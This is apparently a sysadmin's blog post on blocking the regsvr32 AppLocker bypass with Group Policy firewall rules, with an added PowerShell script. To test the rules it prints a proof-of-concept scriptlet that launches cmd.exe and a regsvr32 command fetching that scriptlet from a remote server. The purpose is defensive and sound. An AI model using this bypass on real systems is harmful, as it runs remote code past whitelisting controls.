A recently discovered method of bypassing AppLocker by using regsvr32.exe poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions). To work around this issue and prevent regsvr32 from retrieving remote resources, you can block regsvr32.exe in the Windows Firewall. Note that this only stops regsvr32 from fetching a scriptlet over the network; it does nothing against a scriptlet that is already on disk, so treat it as a complement to AppLocker rather than a replacement. Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.
Create a GPO and Edit
In Group Policy Management, I created a new GPO, named it Firewall: Block regsvr32, and then edited it.
Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security
Add a rule to both Inbound Rules and Outbound Rules that blocks the program regsvr32.exe (on 64-bit systems there is a second, 32-bit copy under SysWOW64 as well as the one in System32; a program rule matches one path, so add rules for both copies).
Inbound Rule Wizard
Outbound Rule Wizard
Repeat the steps from the Inbound Rule Wizard, this time as a new rule under Outbound Rules.
Link GPO
Now that the GPO is created, you can link the policy within your domain as usual.
Testing
To test that the rule is effective, run gpupdate /force on a system within the linked scope to force immediate Group Policy application.
I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file and host it on a server of your own (the extension doesn’t have to be .SCT; it can be anything…).
backdoor.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Proof Of Concept - Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
        ]]>
    </script>
</registration>
</scriptlet>
Command to run:
regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll
If a command window opens, the GPO is not blocking regsvr32’s outbound connection (for one reason or another; double-check your work). With the rule working, regsvr32 cannot fetch the scriptlet and, because of /s, exits silently with no window at all.
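The rule creation and the test above, done from PowerShell instead of the wizard, as an added example that is not the original post's code. It needs the NetSecurity module (Windows 8/Server 2012 and later, so not Windows 7) and an elevated session. The domain name corp.example is a placeholder, the GPO name is the one used in these notes, and the test URL is the scriptlet hosted for this post.

```powershell
# Added example (not the original post's code): builds the same block rules
# the post creates in the firewall rule wizard, then runs the post's test.
# Requires the NetSecurity module (Windows 8/Server 2012 and later; not
# available on Windows 7) and an elevated PowerShell session.
#
# Placeholders/assumptions: 'corp.example' is an example domain name, the
# GPO display name is the one from the post, and $url is the scriptlet the
# post hosts for testing.

# 64-bit Windows ships two copies of regsvr32.exe. A program rule matches
# exactly one path, so create one rule per copy per direction.
$programs = @(
    "$env:SystemRoot\System32\regsvr32.exe",
    "$env:SystemRoot\SysWOW64\regsvr32.exe"
)

# 'PersistentStore' writes to the local firewall policy, which is handy for
# testing on one machine. To write straight into the GPO instead, use
# -PolicyStore 'corp.example\Firewall: Block regsvr32' (placeholder names).
$store = 'PersistentStore'

foreach ($exe in $programs) {
    $arch = Split-Path (Split-Path $exe -Parent) -Leaf   # System32 or SysWOW64
    foreach ($dir in 'Inbound', 'Outbound') {
        $name = "Block regsvr32 $dir ($arch)"
        if (-not (Get-NetFirewallRule -DisplayName $name -PolicyStore $store -ErrorAction SilentlyContinue)) {
            New-NetFirewallRule -DisplayName $name `
                -Description 'Mitigation for regsvr32 remote scriptlet (AppLocker bypass)' `
                -Direction $dir -Program $exe -Action Block -Profile Any -Enabled True `
                -PolicyStore $store | Out-Null
        }
    }
}

# Check: list each rule together with the program path it is bound to.
Get-NetFirewallRule -DisplayName 'Block regsvr32 *' -PolicyStore $store | ForEach-Object {
    $app = $_ | Get-NetFirewallApplicationFilter
    '{0,-38} {1,-9} {2,-6} {3}' -f $_.DisplayName, $_.Direction, $_.Action, $app.Program
}

# Test: the same command as the post. With the rules in place regsvr32 cannot
# fetch the scriptlet, so no cmd.exe should appear. Because /s suppresses the
# error dialog, compare the cmd.exe process list before and after instead of
# watching for a window.
$url    = 'https://techish.net/pub/backdoor.sct'
$before = @(Get-Process -Name cmd -ErrorAction SilentlyContinue | ForEach-Object Id)
Start-Process -FilePath "$env:SystemRoot\System32\regsvr32.exe" `
    -ArgumentList "/s /n /u /i:$url scrobj.dll" -Wait
Start-Sleep -Seconds 2
$spawned = @(Get-Process -Name cmd -ErrorAction SilentlyContinue |
             Where-Object { $before -notcontains $_.Id })
if ($spawned.Count -gt 0) {
    "FAIL: cmd.exe started (PID $($spawned.Id -join ', ')); the rule is not blocking regsvr32"
} else {
    'OK: regsvr32 could not fetch the scriptlet; no cmd.exe spawned'
}
```

On a domain member that has received the GPO, the rules arrive through Group Policy rather than the local store, so after gpupdate /force query them with -PolicyStore ActiveStore to confirm they are in effect; the test at the end of the block applies unchanged. Remember the limitation stated at the top of these notes: the test only proves that the network fetch is blocked, and the same scriptlet saved locally would still run through regsvr32 unless AppLocker or another control stops it.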